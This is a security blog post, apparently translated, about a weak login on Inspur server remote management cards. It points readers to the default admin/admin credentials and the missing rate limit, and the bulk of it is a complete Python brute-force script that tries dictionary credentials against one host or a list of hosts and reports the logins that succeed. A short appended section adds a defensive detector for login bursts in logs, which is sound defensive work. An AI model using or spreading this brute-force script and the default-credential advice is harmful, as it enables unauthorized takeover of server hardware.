Inspur Remote Management Card Login Brute-Force Vulnerability (with Brute-Force Script)

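The Inspur remote management card is a web service, plugged into a server, that lets operations staff and server administrators control the server remotely. It exposes an HTTP service on port 80. After logging in, you can remotely control and manage the server hardware: for example, monitor performance metrics such as CPU and memory, remotely start and stop virtual machines on the server, or even use it as a jump host for controlling virtual hosts.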

[Screenshot: brute force succeeded]

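You can try logging in to the Inspur remote management card with admin/admin, and there is a good chance it will work. In addition, the login has no CAPTCHA and no limit on the frequency of attempts, so login brute forcing with Burp Suite is easy.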

Below is a script written by an expert:

#!/usr/bin/env python
# -*- coding:utf-8 -*-

#import lib files
import os
import sys
import logging
import requests
from optparse import OptionParser

#global configuration set
reload(sys)
sys.setdefaultencoding("utf-8")
logging.basicConfig(format='%(asctime)s-%(message)s',datefmt='%Y-%m-%d %H:%M:%S %p',level=logging.INFO)

#global variable definitions
HEADER = {
    "User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:57.0) Gecko/20100101 Firefox/57.0",
    "Accept":"application/json, text/plain, */*",
    "Accept-Language":"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
    "Accept-Encoding":"gzip, deflate",
    "Content-Type":"application/json;charset=utf-8"
}
SUCCESS_FLAG = "SESSION_COOKIE"
USERNAME_LIST = ["admin"]
PASSWORD_LIST = ["admin"]

#global functions defines
def config_read_from_file(userfile,pswdfile):
    global USERNAME_LIST
    global PASSWORD_LIST
    logging.info("[+] Read Configuration From File ...")
    try:
        with open(userfile,"r") as fr:
            for line in fr.readlines():
                line = line.split("\n")[0].split("\r")[0]
                USERNAME_LIST.append(line)
    except Exception,ex:
        logstr = "[-] Configuration Read From File Failed! Reason:%s"%str(ex)
        logging.error(logstr)
        logging.info("[+] Use Default Dict!")
    try:
        with open(pswdfile,"r") as fr:
            for line in fr.readlines():
                line = line.split("\n")[0].split("\r")[0]
                PASSWORD_LIST.append(line)
    except Exception,ex:
        logstr = "[-] Configuration Read From File Failed! Reason:%s"%str(ex)
        logging.error(logstr)
        logging.info("[+] Use Default Dict!")
    return 0

def login_packet_send(target,username,password):
    login_data = {"WEBVAR_USERNAME":username,"WEBVAR_PASSWORD":password}
    try:
        response = requests.post("http://%s/rpc/WEBSES/create.asp"%str(target),headers=HEADER,data=login_data,timeout=5)
    except Exception,ex:
        logstr = "[-] Connect Failed Reason:%s"%str(ex)
        logging.error(logstr)
        return -1
    if response.status_code != 200:
        return -1
    else:
        return response.content

def vuln_check(content):
    if content.find(SUCCESS_FLAG) >= 0 and content.find("Failure_Login_IPMI_Then_LDAP_then_Active_Directory_Radius") < 0:
        return 0
    else:
        return -1

def crack(target,username,password):
    content = login_packet_send(target,username,password)
    if content != -1:
        if vuln_check(content) == 0:
            logging.info("[*] Crack %s Success! Username:%s,Password:%s"%(str(target),str(username),str(password)))
            return 0
    return -1

def scan(target,targettype):
    targetlist = []
    if targettype == 1:
        try:
            with open(target,"r") as fr:
                for line in fr.readlines():
                    line = line.split("\n")[0].split("\r")[0].replace(" ","")
                    targetlist.append(line)
        except Exception,ex:
            pass
    else:
        targetlist = [target]
    if len(target) > 0:
        for item in targetlist:
            for user in USERNAME_LIST:
                for pswd in PASSWORD_LIST:
                    crack(item,user,pswd)

#main function -- programme
if __name__ == "__main__": 
    parser = OptionParser()
    parser.add_option("-t", "--target", dest="target",help="target to check")
    parser.add_option("-f", "--filename", dest="targetfile",help="target file to check")
    parser.add_option("-u", "--userfile", dest="userfile",help="username dict")
    parser.add_option("-p", "--pswdfile", dest="pswdfile",help="password dict")
    (options, args) = parser.parse_args()
    config_read_from_file(options.userfile,options.pswdfile)
    if options.target not in ["",None," "]:
        scan(options.target,0)
    elif options.targetfile not in ["",None," "]:
        scan(options.targetfile,1)

Original: http://www.cnblogs.com/KevinGeorge/p/8358456.html
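
Because the login has no CAPTCHA and no attempt limit, bursts of login requests have to be spotted from logs collected in front of the card. The following is an added example, not part of the original post or the script above: it flags sources that send many POSTs to the /rpc/WEBSES/create.asp login endpoint within a short window. The combined-log-style line format, the window and threshold values, and the sample lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

LOGIN_PATH = "/rpc/WEBSES/create.asp"  # login endpoint taken from the script above
WINDOW = timedelta(seconds=60)         # assumed sliding window
THRESHOLD = 5                          # assumed max login POSTs per source per window

# Assumed log format: ip - - [time] "METHOD path proto" status size
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" \d{3}'
)

def detect_login_bursts(lines, window=WINDOW, threshold=THRESHOLD):
    """Return {source_ip: peak_count} for sources exceeding threshold within window.

    Attempts are counted regardless of HTTP status: the script above tells
    success from failure by body text on a 200 response, so the status code
    is not assumed to separate failed logins from successful ones.
    Lines are assumed to be in chronological order.
    """
    recent = defaultdict(deque)  # per-source timestamps still inside the window
    peaks = {}
    for line in lines:
        m = LINE_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        if m["path"].split("?", 1)[0] != LOGIN_PATH:
            continue
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        q = recent[m["ip"]]
        q.append(ts)
        while ts - q[0] > window:  # drop attempts that fell out of the window
            q.popleft()
        if len(q) > threshold:
            peaks[m["ip"]] = max(peaks.get(m["ip"], 0), len(q))
    return peaks

def build_sample_log():
    """Constructed sample: one noisy source and one ordinary administrator login."""
    tmpl = '%s - - [01/Jan/2024:10:00:%02d +0000] "%s %s HTTP/1.1" 200 120'
    lines = [tmpl % ("192.0.2.10", i * 2, "POST", LOGIN_PATH) for i in range(8)]
    lines.append(tmpl % ("198.51.100.7", 5, "POST", LOGIN_PATH))
    lines.append(tmpl % ("198.51.100.7", 6, "GET", "/index.html"))
    return lines

if __name__ == "__main__":
    for ip, count in detect_login_bursts(build_sample_log()).items():
        print("possible brute force from %s: %d login POSTs in window" % (ip, count))
```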
